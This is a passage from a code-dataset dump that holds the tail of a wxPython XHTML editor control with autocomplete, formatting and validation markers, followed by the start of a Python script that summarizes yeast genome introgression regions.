self.autocompleteHandler.getHrefList(self.autocompleteLocator,True)\r\n if lst and len(lst) > 0:\r\n # remove leading http://\r\n for i in range(len(lst)):\r\n if lst[i].startswith(u\"http://\"): #$NON-NLS-1$\r\n lst[i] = lst[i][7:]\r\n elif lst[i].startswith(u\"https://\"): #$NON-NLS-1$\r\n lst[i] = lst[i][8:]\r\n lst.sort()\r\n if self._getStcControl().CallTipActive():\r\n self._getStcControl().CallTipCancel()\r\n\r\n self._getStcControl().AutoCompSetAutoHide(True)\r\n self._getStcControl().AutoCompSetIgnoreCase(False)\r\n self._getStcControl().AutoCompSetSeparator(ord(u\"^\"))#$NON-NLS-1$\r\n try:\r\n self._getStcControl().AutoCompShow(0, u\"^\".join(lst)) #$NON-NLS-1$\r\n except:\r\n pass\r\n # end onCharAdded\r\n\r\n def onUserListSelection(self, evt):\r\n lType = evt.GetListType()\r\n text = evt.GetText()\r\n if text and len(text.strip()) > 0:\r\n p1 = self._getStcControl().AutoCompPosStart()\r\n p2 = self._getStcControl().GetCurrentPos()\r\n if lType == ZStcLocator.OPENTAG:\r\n if self.autocompleteHandler.isEmptyTag(text):\r\n if text == u\"img\": #$NON-NLS-1$\r\n text = text + u' src=\"\" alt=\"\"' #$NON-NLS-1$\r\n text = text + u\" />\" #$NON-NLS-1$\r\n else:\r\n text = text + u\" \" #$NON-NLS-1$\r\n elif lType == ZStcLocator.CLOSETAG:\r\n text = text + u'>' #$NON-NLS-1$\r\n elif lType == ZStcLocator.INSIDETAG:\r\n text = text + u'=\"' #$NON-NLS-1$\r\n elif lType == ZStcLocator.ATTRVALUE and self.autocompleteLocatorInfo.attributeName and self.autocompleteLocatorInfo.attributeName.lower() == u\"style\" : #$NON-NLS-1$\r\n text = text + u':' #$NON-NLS-1$\r\n elif lType == ZStcLocator.ATTRVALUE and self.autocompleteLocatorInfo.attributeName and self.autocompleteLocatorInfo.attributeName.lower() == u\"href\" : #$NON-NLS-1$\r\n if text.lower().strip() == ZStcAutoCompleteHandler.ALL_POSTS_HREF.lower():\r\n pass\r\n #text = self._showPostsDialog()\r\n elif lType == ZStcLocator.SUBATTRNAME:\r\n if text.strip().lower() == ZStcAutoCompleteHandler.CUSTOM_COLORS.lower():\r\n text = self._showColorChooserDialog()\r\n if text and len(text) > 0:\r\n text = text + u'; ' #$NON-NLS-1$\r\n if p1 >=0 and p2 > p1:\r\n self._getStcControl().SetSelection(p1,p2)\r\n self._getStcControl().ReplaceSelection(text)\r\n else:\r\n self._getStcControl().AddText(text)\r\n # end onUserListSelection\r\n\r\n def _showColorChooserDialog(self):\r\n rVal = u\"\" #$NON-NLS-1$\r\n dlg = wx.ColourDialog(self)\r\n dlg.CentreOnParent()\r\n dlg.GetColourData().SetChooseFull(True)\r\n if dlg.ShowModal() == wx.ID_OK:\r\n data = dlg.GetColourData().GetColour().Get() #RGB tuple\r\n color = ZCssColor(red = data[0], blue = data[2], green = data[1])\r\n rVal = color.getCssColor().upper()\r\n dlg.Destroy()\r\n return rVal\r\n # end _showColorChooserDialog()\r\n\r\n def onUpdateUI(self, event): #@UnusedVariable\r\n self._fireUpdateUIEvent()\r\n # check for matching braces\r\n self._matchBraces()\r\n event.Skip()\r\n # end onUpdateUI()\r\n\r\n def onChange(self, event): #@UnusedVariable\r\n if self.contentLoaded:\r\n self._fireContentModifiedEvent()\r\n # end onChange()\r\n\r\n def onSelectionChange(self, event): #@UnusedVariable\r\n selection = None\r\n self._fireSelectionChangeEvent(selection)\r\n event.Skip()\r\n # end onSelectionChange()\r\n\r\n def onRightClick(self, event):\r\n xyPoint = event.GetPosition()\r\n self._fireContextMenuEvent(self, xyPoint)\r\n # end onRightClick()\r\n \r\n def setValue(self, value):\r\n self.clearValidation()\r\n # we need to reset the undo buffer otherwise the last undo will remove the text.\r\n self._getStcControl().EmptyUndoBuffer() \r\n self._internalSetValue(value)\r\n # end setValue\r\n\r\n def _internalSetValue(self, value):\r\n self.contentLoaded = False\r\n self._getStcControl().SetText(value)\r\n # set line break to be \\n\r\n self._getStcControl().SetEOLMode(STC_EOL_LF)\r\n self._getStcControl().ConvertEOLs(STC_EOL_LF)\r\n self.contentLoaded = True\r\n self._fireUpdateUIEvent()\r\n # end _internalSetValue\r\n\r\n def getValue(self):\r\n return self._getStcControl().GetText()\r\n # end getValue()\r\n\r\n def getCaretPosition(self):\r\n pos = self._getStcControl().GetCurrentPos()\r\n col = self._getStcControl().GetColumn(pos) + 1\r\n row = self._getStcControl().LineFromPosition(pos) + 1\r\n return (row,col)\r\n # end getCaretPosition()\r\n \r\n def clearState(self):\r\n pass\r\n # end clearState()\r\n\r\n def hasSelection(self):\r\n (start,end) = self._getStcControl().GetSelection()\r\n return start != end\r\n # hasSelection()\r\n\r\n def canCut(self):\r\n return self.hasSelection()\r\n # end canCut()\r\n\r\n def cut(self):\r\n self._getStcControl().Cut()\r\n # end cut()\r\n\r\n def canCopy(self):\r\n return self.canCut()\r\n # end canCopy()\r\n\r\n def copy(self):\r\n self._getStcControl().Copy()\r\n # end copy()\r\n\r\n def canPaste(self):\r\n return self._getStcControl().CanPaste()\r\n # end canPaste()\r\n\r\n def paste(self):\r\n self._getStcControl().Paste()\r\n # end paste()\r\n\r\n def canSelectAll(self):\r\n return True\r\n # end canSelectAll()\r\n\r\n def selectAll(self):\r\n self._getStcControl().SelectAll()\r\n # end selectAll()\r\n\r\n def selectNone(self):\r\n (start,end) = self._getStcControl.GetSelection() #@UnusedVariable\r\n self.SetSelection(start,start)\r\n # selectNone()\r\n\r\n def canUndo(self):\r\n return self._getStcControl().CanUndo()\r\n # end canUndo()\r\n\r\n def undo(self):\r\n self._getStcControl().Undo()\r\n # end undo()\r\n\r\n def canRedo(self):\r\n return self._getStcControl().CanRedo()\r\n # end canRedo()\r\n\r\n def redo(self):\r\n self._getStcControl().Redo()\r\n # end redo()\r\n\r\n def isFormattingEnabled(self, capabilityId): #@UnusedVariable\r\n if self.hasCapability(capabilityId):\r\n return True\r\n else:\r\n return False\r\n # end isFormattingEnabled()\r\n\r\n def getFormattingState(self, capabilityId): #@UnusedVariable\r\n return False\r\n # end getFormattingState()\r\n\r\n def applyFormatting(self, capabilityId, customData): #@UnusedVariable\r\n if capabilityId == IZRichTextEditControl.ZCAPABILITY_BOLD:\r\n self._wrapSelectionWithTag(u\"strong\") #$NON-NLS-1$\r\n elif capabilityId == IZRichTextEditControl.ZCAPABILITY_ITALIC:\r\n self._wrapSelectionWithTag(u\"em\") #$NON-NLS-1$\r\n elif capabilityId == IZRichTextEditControl.ZCAPABILITY_UNDERLINE:\r\n self._wrapSelectionWithTag(u\"span\", u\"text-decoration: underline\") #$NON-NLS-1$, #$NON-NLS-2$\r\n elif capabilityId == IZRichTextEditControl.ZCAPABILITY_STRIKETHRU:\r\n self._wrapSelectionWithTag(u\"del\") #$NON-NLS-1$\r\n # end applyFormatting()\r\n\r\n def canPasteXhtml(self):\r\n return self.canPaste()\r\n # end canPasteXhtml()\r\n\r\n def pasteXhtml(self):\r\n # get text from clipboard and insert xhtml\r\n content = getTextFromClipboard()\r\n if content:\r\n xhtmlDoc = loadXhtmlDocumentFromString(content)\r\n if xhtmlDoc:\r\n html = u\"\" #$NON-NLS-1$\r\n for node in xhtmlDoc.getBody().selectNodes(u\"child::*\"): #$NON-NLS-1$\r\n html = html + node.serialize()\r\n self._insertHtml(html, 0)\r\n # end pasteXhtml()\r\n\r\n def canInsertXhtml(self):\r\n return True\r\n # end canInsertXhtml\r\n\r\n def insertXhtml(self, xhtmlString): #@UnusedVariable\r\n self._insertHtml(xhtmlString, 0)\r\n # end insertXhtml\r\n\r\n def createFindReplaceContext(self):\r\n selectedText = self._getStcControl().GetSelectedText()\r\n return ZStyledXhtmlEditControlFindReplaceTextContext(self._getStcControl(), selectedText)\r\n # end createFindReplaceContext()\r\n\r\n def _wrapSelectionWithTag(self, tag, style = None):\r\n s = u\"\" #$NON-NLS-1$\r\n startTag = tag\r\n if style and tag:\r\n startTag = tag + u' style=\"%s\" ' % style #$NON-NLS-1$\r\n posOffset = 0\r\n if self.hasSelection() and tag:\r\n s = u\"<%s>%s\" % (startTag, self._getStcControl().GetSelectedText(), tag) #$NON-NLS-1$\r\n elif tag:\r\n s = u\"<%s>\" % (startTag, tag) #$NON-NLS-1$\r\n posOffset = len(startTag) + 2\r\n self._insertHtml(s, posOffset)\r\n #end _wrapSelectionWithTag()\r\n\r\n def _insertHtml(self, html, posOffset):\r\n if not html:\r\n return\r\n pos = self._getStcControl().GetCurrentPos()\r\n if self.hasSelection():\r\n self._getStcControl().ReplaceSelection(html)\r\n else:\r\n self._getStcControl().AddText(html)\r\n if posOffset > 0:\r\n self._getStcControl().EnsureCaretVisible()\r\n self._getStcControl().SetCurrentPos(pos + posOffset)\r\n pos = self._getStcControl().GetCurrentPos()\r\n self._getStcControl().SetSelectionStart(pos)\r\n self._getStcControl().EnsureCaretVisible()\r\n # end _insertHtml()\r\n\r\n def onMarginClick(self, evt):\r\n self._resetMarkerHighLighting()\r\n if evt.GetMargin() == 1:\r\n pos = evt.GetPosition()\r\n line = self._getStcControl().LineFromPosition(evt.GetPosition())\r\n self._handleMarkerMarginClicked(pos, line)\r\n evt.Skip()\r\n # end onMarginClick\r\n\r\n def _handleMarkerMarginClicked(self, pos, line): #@UnusedVariable\r\n # called when the user clicked on a marker on the margin.\r\n self._highlightMarkerLine(-1)\r\n # find marker by line number:\r\n line = line + 1 # adjust for 0 based index\r\n for zxhtmlValidationMessage in self.validationReportProvider.getValidationMessages(): #@UnusedVariable\r\n if zxhtmlValidationMessage.getLine() == line:\r\n # FIXME hightlight message in list control\r\n pass\r\n # end _handleMarkerMarginClicked\r\n\r\n def _highlightMarkerLine(self, aLineNum, aColNum=-1):\r\n self._getStcControl().MarkerDeleteAll(IZZStyledTextCtrlMarkers.MARKER_ARROW)\r\n if aLineNum < 0:\r\n return\r\n\r\n self._getStcControl().MarkerAdd(aLineNum, IZZStyledTextCtrlMarkers.MARKER_ARROW)\r\n self._getStcControl().EnsureCaretVisible()\r\n pos = self._getStcControl().PositionFromLine(aLineNum)\r\n if aColNum >= 0:\r\n p = pos + aColNum\r\n if p <= self._getStcControl().GetTextLength():\r\n pos = p\r\n self._getStcControl().SetCurrentPos(pos)\r\n self._getStcControl().SetSelectionStart(pos)\r\n self._getStcControl().EnsureCaretVisible()\r\n self._getStcControl().SetCaretLineBack(wx.Colour(red=255, green=255, blue=102))\r\n self._getStcControl().SetCaretLineVisible(True)\r\n # end _highlightMarkerLine()\r\n\r\n def _resetMarkerHighLighting(self):\r\n if self._getStcControl().GetCaretLineVisible():\r\n self._getStcControl().SetCaretLineVisible(False)\r\n # end _resetMarkerHighLighting()\r\n\r\n def _clearAllMarkers(self):\r\n self._getStcControl().MarkerDeleteAll(IZZStyledTextCtrlMarkers.MARKER_NONE)\r\n self._getStcControl().MarkerDeleteAll(IZZStyledTextCtrlMarkers.MARKER_OK)\r\n self._getStcControl().MarkerDeleteAll(IZZStyledTextCtrlMarkers.MARKER_WARN)\r\n self._getStcControl().MarkerDeleteAll(IZZStyledTextCtrlMarkers.MARKER_ERROR)\r\n self._getStcControl().MarkerDeleteAll(IZZStyledTextCtrlMarkers.MARKER_ARROW)\r\n self._resetMarkerHighLighting()\r\n # end _clearAllMarkers()\r\n\r\n def _addValidationMessageMarker(self, zxhtmlValidationMessage):\r\n if not zxhtmlValidationMessage:\r\n return\r\n symbol = IZZStyledTextCtrlMarkers.MARKER_NONE\r\n if zxhtmlValidationMessage.getSeverity() == ZXhtmlValidationMessage.SUCCESS:\r\n symbol = IZZStyledTextCtrlMarkers.MARKER_OK\r\n elif zxhtmlValidationMessage.getSeverity() == ZXhtmlValidationMessage.WARNING:\r\n symbol = IZZStyledTextCtrlMarkers.MARKER_WARN\r\n elif zxhtmlValidationMessage.getSeverity() == ZXhtmlValidationMessage.ERROR:\r\n symbol = IZZStyledTextCtrlMarkers.MARKER_ERROR\r\n elif zxhtmlValidationMessage.getSeverity() == ZXhtmlValidationMessage.FATAL:\r\n symbol = IZZStyledTextCtrlMarkers.MARKER_ERROR\r\n\r\n if zxhtmlValidationMessage.getLine() > 0:\r\n self._getStcControl().MarkerAdd(zxhtmlValidationMessage.getLine() - 1, symbol)\r\n # end _addValidationMessageMarker()\r\n\r\n def schemaValidate(self):\r\n # IZXHTMLEditControl impl.\r\n fireUIExecEvent(ZMethodRunnable(self._showViewAndRunValidation), self)\r\n # end schemaValidate\r\n\r\n def _showValidationView(self):\r\n if not self.validationView.IsShown():\r\n self.validationView.Show(True)\r\n self.Layout()\r\n # end _showValidationView\r\n\r\n def _hideValidationView(self):\r\n if self.validationView.IsShown():\r\n self.validationView.Show(False)\r\n self.Layout()\r\n # end _hideValidationView\r\n\r\n def _showViewAndRunValidation(self):\r\n self._showValidationView()\r\n fireUIExecEvent(ZMethodRunnable(self._runValidation), self)\r\n # end _showViewAndRunValidation\r\n\r\n def _runValidation(self):\r\n self._clearValidation()\r\n ZXhtmlSchemaUiUtil().validateHtmlBody(None, self.getValue(), self )\r\n # end _runValidation\r\n\r\n def _clearValidation(self):\r\n # IZXHTMLEditControl impl.\r\n self._clearAllMarkers()\r\n self.validationReportProvider.clearValidationMessages()\r\n self.validationView.getListControl().refresh()\r\n # end _clearValidation\r\n\r\n def clearValidation(self):\r\n # IZXHTMLEditControl impl.\r\n self._clearValidation()\r\n self._hideValidationView()\r\n # end clearValidation\r\n\r\n def runTidy(self):\r\n # IZXHTMLEditControl impl.\r\n fireUIExecEvent(ZMethodRunnable(self._internalRunTidy), self)\r\n # end runTidy\r\n\r\n def _internalRunTidy(self):\r\n self._showValidationView()\r\n self._clearValidation()\r\n (success, htmlResult, messageList) = ZXhtmlSchemaUiUtil().tidyHtmlBody(None, self.getValue(), self ) #@UnusedVariable\r\n if success:\r\n self._getStcControl().SetText(htmlResult)\r\n # end _internalRunTidy\r\n\r\n def onValidationItemSelected(self, event):\r\n index = event.GetIndex()\r\n zxhtmlValidationMessage = self.validationReportProvider.getValidationMessage(index)\r\n if zxhtmlValidationMessage:\r\n self._highlightMarkerLine(zxhtmlValidationMessage.getLine()-1, zxhtmlValidationMessage.getColumn())\r\n # end onValidationItemSelected\r\n\r\n def onValidationItemActivated(self, event): #@UnusedVariable\r\n pass\r\n # end onValidationItemActivated\r\n\r\n def onXhtmlValidationStart(self):\r\n pass\r\n # end onXhtmlValidationStart\r\n\r\n def onXhtmlValidationEnd(self, messageCount):\r\n if messageCount == 0:\r\n m = ZXhtmlValidationMessage(ZXhtmlValidationMessage.SUCCESS, -1,-1, u\"Completed successfully.\") #$NON-NLS-1$\r\n self.validationReportProvider.addValidationMessage(m)\r\n else:\r\n m = ZXhtmlValidationMessage(ZXhtmlValidationMessage.ERROR, -1, -1, u\"Completed with problems.\") #$NON-NLS-1$\r\n self.validationReportProvider.addValidationMessage(m)\r\n self.validationView.getListControl().refresh()\r\n # end onXhtmlValidationEnd\r\n\r\n def onXhtmlValidationMessage(self, zxhtmlValidationMessage): #@UnusedVariable\r\n self.validationReportProvider.addValidationMessage(zxhtmlValidationMessage)\r\n self._addValidationMessageMarker(zxhtmlValidationMessage)\r\n # end onXhtmlValidationMessage\r\n\r\n def onXhtmlValidationException(self, exception): #@UnusedVariable\r\n pass\r\n # end onXhtmlValidationException\r\n\r\n# end ZStyledXhtmlEditControl\r\n","sub_path":"src/python/zoundry/appframework/ui/widgets/controls/advanced/stc/stceditor.py","file_name":"stceditor.py","file_ext":"py","file_size_in_byte":32252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"75729381","text":"from __future__ import annotations\nimport bisect\nimport gzip\nimport numpy as np\nimport pickle\nfrom contextlib import ExitStack\nimport click\nimport logging as log\nfrom collections import Counter\nfrom misc import read_fasta\nfrom misc import read_table\nfrom misc import seq_functions\nfrom typing import List, Tuple, Dict\nfrom analyze.introgression_configuration import Configuration\n\n\ncen_starts = [151465, 238207, 114385, 449711, 151987, 148510,\n 496920, 105586, 355629, 436307, 440129, 150828,\n 268031, 628758, 326584, 555957]\ncen_starts = [x-1 for x in cen_starts]\n\ncen_ends = [151582, 238323, 114501, 449821, 152104, 148627,\n 497038, 105703, 355745, 436425, 440246, 150947,\n 268149, 628875, 326702, 556073]\ncen_ends = [x-1 for x in cen_ends]\n\ntel_coords = [1, 801, 229411, 230218,\n 1, 6608, 812379, 813184,\n 1, 1098, 315783, 316620,\n 1, 904, 1524625, 1531933,\n 1, 6473, 569599, 576874,\n 1, 5530, 269731, 270161,\n 1, 781, 1083635, 1090940,\n 1, 5505, 556105, 562643,\n 1, 7784, 439068, 439888,\n 1, 7767, 744902, 745751,\n 1, 807, 665904, 666816,\n 1, 12085, 1064281, 1078177,\n 1, 6344, 923541, 924431,\n 1, 7428, 783278, 784333,\n 1, 847, 1083922, 1091291,\n 1, 7223, 942396, 948010]\ntel_coords = [x-1 for x in tel_coords]\n\ntel_left_starts = [tel_coords[i] for i in range(0, len(tel_coords), 4)]\ntel_left_ends = [tel_coords[i] for i in range(1, len(tel_coords), 4)]\ntel_right_starts = [tel_coords[i] for i in range(2, len(tel_coords), 4)]\ntel_right_ends = [tel_coords[i] for i in range(3, len(tel_coords), 4)]\n\nchromosomes = ('I II III IV V '\n 'VI VII VIII IX X '\n 'XI XII XIII XIV XV XVI').split()\n\n\ndef distance_from_telomere(start, end, chrm):\n\n assert start <= end, str(start) + ' ' + str(end)\n\n i = chromosomes.index(chrm)\n # region entirely on left arm\n if end <= cen_starts[i]:\n return start - tel_left_ends[i]\n # region entirely on right arm\n if start >= cen_ends[i]:\n return tel_right_starts[i] - end\n # region overlaps centromere: return minimum distance from either telomere\n return min(start - tel_left_ends[i], tel_right_starts[i] - end)\n\n\ndef distance_from_centromere(start, end, chrm):\n\n assert start <= end, str(start) + ' ' + str(end)\n\n i = chromosomes.index(chrm)\n # region entirely on left arm\n if end <= cen_starts[i]:\n return cen_starts[i] - end\n # region entirely on right arm\n if start >= cen_ends[i]:\n return start - cen_ends[i]\n # region overlaps centromere: return 0\n return 0\n\n\ndef write_region_summary_plus(fn, regions, fields):\n f = open(fn, 'w')\n f.write('region_id\\t' + '\\t'.join(fields) + '\\n')\n keys = sorted(regions.keys(), key=lambda x: int(x[1:]))\n for region_id in keys:\n f.write(region_id + '\\t')\n f.write('\\t'.join([str(regions[region_id][field])\n for field in fields]))\n f.write('\\n')\n f.close()\n\n\ndef gap_columns(seqs):\n g = 0\n for i in range(len(seqs[0])):\n for seq in seqs:\n if seq[i] == '-': # gp.gap_symbol:\n g += 1\n break\n return g\n\n\ndef longest_consecutive(s, c):\n max_consecutive = 0\n current_consecutive = 0\n in_segment = False\n for i in range(len(s)):\n if s[i] == c:\n current_consecutive += 1\n in_segment = True\n else:\n if in_segment:\n max_consecutive = max(max_consecutive, current_consecutive)\n current_consecutive = 0\n in_segment = False\n return max_consecutive\n\n\ndef masked_columns(seqs):\n # return two things:\n # - number of columns that are masked in any sequence\n # - above, but excluding columns with gaps\n num_seqs = len(seqs)\n num_sites = len(seqs[0])\n mask_total = 0\n mask_non_gap_total = 0\n for ps in range(num_sites):\n mask = False\n gap = False\n for s in range(num_seqs):\n if seqs[s][ps] == '-': # gp.gap_symbol:\n gap = True\n elif seqs[s][ps] == 'x': # gp.masked_symbol:\n mask = True\n if mask:\n mask_total += 1\n if not gap:\n mask_non_gap_total += 1\n return mask_total, mask_non_gap_total\n\n\ndef index_by_reference(ref_seq, seq):\n # return dictionary keyed by reference index, with value the\n # corresponding index in non-reference sequence\n\n d = {}\n ri = 0\n si = 0\n for i in range(len(ref_seq)):\n if ref_seq[i] != '-': # gp.gap_symbol:\n d[ri] = si\n ri += 1\n if seq[i] != '-': # gp.gap_symbol:\n si += 1\n return d\n\n\ndef num_sites_between(sites, start, end):\n # sites are sorted\n i = bisect.bisect_left(sites, start)\n j = bisect.bisect_right(sites, end)\n return j - i, sites[i:j]\n\n\nclass Summarizer():\n '''\n Summarize region quality of each region\n '''\n def __init__(self, configuration: Configuration):\n self.config = configuration\n\n def validate_arguments(self):\n '''\n Check that all required instance variables are set to perform a\n summarize run. Returns true if valid, raises value error otherwise\n '''\n args = [\n 'chromosomes',\n 'labeled_blocks',\n 'quality_blocks',\n 'masks',\n 'alignment',\n 'positions',\n 'regions',\n 'region_index',\n 'known_states',\n 'unknown_states',\n 'states',\n 'symbols'\n ]\n variables = self.config.__dict__\n for arg in args:\n if arg not in variables or variables[arg] is None:\n err = ('Failed to validate Summarizer, required argument '\n f\"'{arg}' was unset\")\n log.exception(err)\n raise ValueError(err)\n\n reference = self.config.get('analysis_params.reference')\n if reference is None:\n err = f'Configuration did not specify a reference strain'\n log.exception(err)\n raise ValueError(err)\n\n return True\n\n def run(self, states: List[str] = None):\n '''\n Summarize region quality of each region for the states specified\n '''\n ref_ind, states = self.states_to_process(states)\n\n log.debug(f'reference index: {ref_ind}')\n log.debug(f'states to analyze: {states}')\n\n known_states = self.config.known_states\n log.debug(f'known_states {known_states}')\n\n analyzer = Sequence_Analyzer(\n self.config.masks,\n self.config.alignment,\n self.config.known_states,\n self.config.interval_states,\n self.config.chromosomes,\n self.config.symbols)\n\n log.debug(f'Sequence_Analyzer init with:')\n log.debug(f'masks: {self.config.masks}')\n log.debug(f'alignment: {self.config.alignment}')\n\n analyzer.build_masked_sites()\n\n for ind, state in enumerate(states):\n log.info(f'Working on state {state}')\n state_ind = self.config.states.index(state)\n\n with Position_Reader(\n self.config.positions\n ) as positions,\\\n Region_Writer(\n self.config.regions.format(state=state),\n self.config.region_index.format(state=state),\n known_states\n ) as region_writer,\\\n Quality_Writer(\n self.config.quality_blocks.format(state=state)\n ) as quality_writer,\\\n ExitStack() as stack:\n\n progress_bar = None\n if self.config.log_file:\n progress_bar = stack.enter_context(\n click.progressbar(\n length=len(self.config.chromosomes),\n label=f'State {ind+1} of {len(states)}'))\n\n for chrm in self.config.chromosomes:\n log.info(f'Working on chromosome {chrm}')\n region = Region_Database(\n self.config.labeled_blocks.format(state=state),\n chrm,\n known_states)\n\n for strain, ps in positions.get_positions(region, chrm):\n log.debug(f'{strain} {chrm}')\n\n analyzer.process_alignment(ref_ind,\n state_ind,\n chrm,\n strain,\n ps,\n region,\n region_writer)\n\n quality_writer.write_quality(region)\n\n if progress_bar:\n progress_bar.update(1)\n\n def states_to_process(self,\n states: List[str] = None) -> Tuple[int,\n List[str]]:\n '''\n Set the states to summarize to the values passed in.\n If no values are specified, run all states in config\n Checks if states are in config, warning if a state is not\n found and raising an error if none of the states are in config.\n '''\n reference = self.config.get('analysis_params.reference.name')\n ref_ind = self.config.states.index(reference)\n\n if states is None or states == []:\n to_process = self.config.states\n\n else:\n to_process = []\n for s in states:\n if s in self.config.states:\n to_process.append(s)\n else:\n log.warning(f\"state '{s}' was not found as a state\")\n\n if to_process == []:\n err = 'No valid states were found to process'\n log.exception(err)\n raise ValueError(err)\n\n return ref_ind, to_process\n\n\nclass Flag_Info():\n '''\n Collection of boolean flags for sequence summary\n '''\n def __init__(self):\n self.gap_any = None\n self.mask_any = None\n self.unseq_any = None\n self.hmm = None\n self.gap = None\n self.mask = None\n self.unseq = None\n self.match = None\n\n def initialize_flags(self, number_sequences: int, number_states: int):\n '''\n Initialize internal flags to np arrays of false\n '''\n self.gap_any = np.zeros((number_sequences), bool)\n self.mask_any = np.zeros((number_sequences), bool)\n self.unseq_any = np.zeros((number_sequences), bool)\n self.gap = np.zeros((number_sequences, number_states), bool)\n self.mask = np.zeros((number_sequences, number_states), bool)\n self.unseq = np.zeros((number_sequences, number_states), bool)\n self.match = np.zeros((number_sequences, number_states), bool)\n\n def add_sequence_flags(self, other: Flag_Info, state: int):\n '''\n Join the other flag info with this info by replacing values\n in the gap, unseq, and match arrays and performing OR with anys\n '''\n # only write the first time\n if state == 0:\n self.hmm = other.hmm\n\n self.gap_any = np.logical_or(self.gap_any, other.gap)\n self.unseq_any = np.logical_or(self.unseq_any, other.unseq)\n\n self.gap[:, state] = other.gap\n self.unseq[:, state] = other.unseq\n self.match[:, state] = other.match\n\n def add_mask_flags(self, other: Flag_Info, state: int):\n '''\n Join the other flag info with this by replacing values in mask and\n performing an OR with mask_any\n '''\n self.mask_any = np.logical_or(self.mask_any, other.mask)\n self.mask[:, state] = other.mask\n\n def encode_info(self,\n master_ind: int,\n predict_ind: int) -> str:\n '''\n Summarize info flags into a string. master_ind is the index of\n the master reference state. predict_ind is the index of the predicted\n state. The return string is encoded for each position as:\n '-': if either master or predict has a gap\n '_': if either master or predict is masked\n '.': if any state has a match\n 'b': both predict and master match\n 'c': master matches but not predict\n 'p': predict matches but not master\n 'x': no other condition applies\n if the position is in the hmm_flag\n it will be capitalized for x, p, c, or b\n in order of precidence, e.g. if a position satisfies both '-' and '.',\n it will be '-'.\n '''\n\n if predict_ind >= self.match.shape[1]:\n return self.encode_unknown_info(master_ind)\n\n decoder = np.array(list('xXpPcCbB._-'))\n indices = np.zeros(self.match.shape[0], int)\n\n indices[self.match[:, predict_ind]] += 2 # x to p if true\n indices[self.match[:, master_ind]] += 4 # x to c, p to b\n indices[self.hmm] += 1 # to upper\n\n matches = np.all(self.match, axis=1)\n indices[matches] = 8 # .\n indices[np.any(\n self.mask[:, [master_ind, predict_ind]],\n axis=1)] = 9 # _\n indices[np.any(\n self.gap[:, [master_ind, predict_ind]],\n axis=1)] = 10 # -\n\n return ''.join(decoder[indices])\n\n def encode_unknown_info(self,\n master_ind: int) -> str:\n '''\n Summarize info dictionary into a string for unknown state.\n master_ind is the index of the master reference state.\n The return string is encoded as each position as:\n '-': if any state has a gap\n '_': if any state has a mask\n '.': all states match\n 'x': master matches\n 'X': no other condition applies\n in order of precidence, e.g. if a position satisfies both '-' and '.',\n it will be '-'.\n '''\n\n # used with indices to decode result\n decoder = np.array(list('Xx._-'))\n indices = np.zeros(self.gap_any.shape, int)\n\n indices[self.match[:, master_ind]] = 1 # x\n matches = np.all(self.match, axis=1)\n indices[matches] = 2 # .\n indices[self.mask_any] = 3 # _\n indices[self.gap_any] = 4 # -\n\n return ''.join(decoder[indices])\n\n\nclass Sequence_Analyzer():\n '''\n Performs handling of masking, reading, and analyzing sequence data for\n summarizing the sequences\n '''\n def __init__(self,\n mask_file: str,\n alignment_file: str,\n known_states: List,\n interval_states: List,\n chromosomes: List,\n symbols: Dict):\n self.masks = mask_file\n self.alignments = alignment_file\n self.known_states = known_states\n self.interval_states = interval_states\n self.chromosomes = chromosomes\n self.symbols = symbols\n\n def build_masked_sites(self):\n '''\n Read in all intervals files and return dictionary of intervals,\n keyed first by chromosome, then state\n '''\n result = {}\n for chrom in self.chromosomes:\n result[chrom] = {}\n for state, name in zip(self.known_states, self.interval_states):\n result[chrom][state] = self.read_masked_sites(chrom, name)\n\n self.masked_sites = result\n\n def read_masked_sites(self, chrom: str, strain: str) -> np.array:\n filename = self.masks.format(chrom=chrom, strain=strain)\n intervals = self.read_masked_intervals(filename)\n sites = self.convert_intervals_to_sites(intervals)\n return sites\n\n def convert_intervals_to_sites(self,\n intervals: List[Tuple]) -> np.array:\n '''\n Given a list of start, end positions, returns a 1D np.array of sites\n contained in the intervals List\n convert_intervals_to_sites([(1, 2), (4, 6)]) -> [1, 2, 4, 5, 6]\n '''\n sites = []\n for start, end in intervals:\n sites += range(start, end + 1)\n return np.array(sites, dtype=int)\n\n def read_masked_intervals(self,\n filename: str) -> List[Tuple[int, int]]:\n '''\n Read the interval file provided and return start and end sequences\n as a list of tuples of 2 ints\n '''\n with open(filename, 'r') as reader:\n reader.readline() # header\n intervals = []\n for line in reader:\n line = line.split()\n intervals.append((int(line[0]), int(line[2])))\n\n return intervals\n\n def get_stats(self,\n current_sequence,\n other_sequence,\n slice_start,\n aligned_index_positions,\n masked_site):\n '''\n Helper function to perform analyses on the sequences returning\n the results of seq_id_hmm, seq_id, and seq_id_unmasked\n '''\n\n # only alignment columns used by HMM (polymorphic, no\n # gaps in any strain)\n hmm_stats = self.seq_id_hmm(other_sequence,\n current_sequence,\n slice_start,\n aligned_index_positions)\n\n # all alignment columns, excluding ones with gaps in\n # these two sequences\n nongap_stats = seq_functions.seq_id(other_sequence,\n current_sequence)\n\n # all alignment columns, excluding ones with gaps or\n # masked bases or unsequenced in *these two sequences*\n nonmask_stats = self.seq_id_unmasked(other_sequence,\n current_sequence,\n slice_start,\n masked_site[0],\n masked_site[1])\n\n return hmm_stats, nongap_stats, nonmask_stats\n\n def seq_id_hmm(self,\n seq1: np.array,\n seq2: np.array,\n offset: int,\n include_sites: List[int]) -> Tuple[\n int, int, Flag_Info]:\n '''\n Compare two sequences and provide statistics of their overlap\n considering only the included sites.\n Takes the two sequences to consider, an offset of the included sites,\n and a list of the included sites.\n Returns:\n -the total number of matching sites, where seq1[i] == seq2[i] and\n i is an element in included_sites - offset\n -the total number of sites considered in the included sites, e.g. where\n included_sites - offset >= 0 and < len(seq)\n -a Flag_Info object with:\n -gap: true where seq1 or seq1 == gap_symbol\n -unseq: true where seq1 or seq1 == unsequenced_symbol\n -hmm: true where hmm[i] is in included_sites - offset\n -match: true where seq1 == seq2, regardless of symbol\n '''\n sites = np.array(include_sites) - offset\n\n info = Flag_Info()\n info.gap = np.logical_or(seq1 == self.symbols['gap'],\n seq2 == self.symbols['gap'])\n info.unseq = np.logical_or(seq1 == self.symbols['unsequenced'],\n seq2 == self.symbols['unsequenced'])\n info.match = seq1 == seq2\n info.hmm = np.zeros(info.match.shape, bool)\n sites = sites[np.logical_and(sites < len(info.match), sites >= 0)]\n info.hmm[sites] = True\n\n total_sites = np.sum(info.hmm)\n total_match = np.sum(np.logical_and(info.hmm, info.match))\n\n # check all included are not gapped or 